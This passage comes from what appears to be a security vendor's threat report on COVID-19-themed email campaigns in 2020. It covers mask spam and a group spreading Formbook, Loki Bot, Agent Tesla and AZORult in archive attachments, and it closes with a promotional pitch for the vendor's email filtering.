Next, we take a look at the spammers. These groups usually try to sell the recipient products or services, or try to generate traffic for websites (illicit SEO) or spike interest in stock (market manipulation).

Here it is clear which products related to the corona crisis spammers are likely to spam – masks. Lots of them:

The timeline of these activities shows that not only the diversity in different masks being advertised, but also the overall volume of these spam emails, is increasing:



Malware mass distribution

Last but not least, activities distributing malware have also been observed pivoting to corona related lure emails. To this end, we present insights into one threat activity group that has been observed distributing Formbook [1], Loki Bot [2], Agent Tesla [3] and AZORult [4] malware inside of various archives (ZIP, RAR, ACE, ISO, GZ, …) attached to emails.

While the Security Lab has continuously tracked this activity, on 17 March 2020 some emails belonging to this activity group started using either “corona” or “Covid-19” in either the subject or attachment names. This trend keeps on increasing, as can be seen from the following timeline, which displays emails by this activity group without a corona theme in green and emails with a corona theme in red:



Conclusion and Remediation

In general, the risk to the economy from these threat activities is the same as before the crisis. Cyber-criminals continue to use the same schemes and mechanisms.

However, it is highly probable that potential victims are more likely to fall for the fraudulent practices in view of the current events. Another aspect that should not be neglected is that emails that address sensitive topics in times of crisis also address the psyche of the recipients and may even put a strain on them.

A good email filtering system should prevent these emails from reaching end users’ mailboxes – regardless of whether they contain a reference to Corona or not.

Hornetsecurity’s Spam and Malware Protection offers the highest detection rates on the market with a guaranteed 99.9% spam detection and 99.99% virus detection. This means that even opportunists who want to exploit the Corona crisis have no chance of sneaking into end users’ mailboxes and causing damage.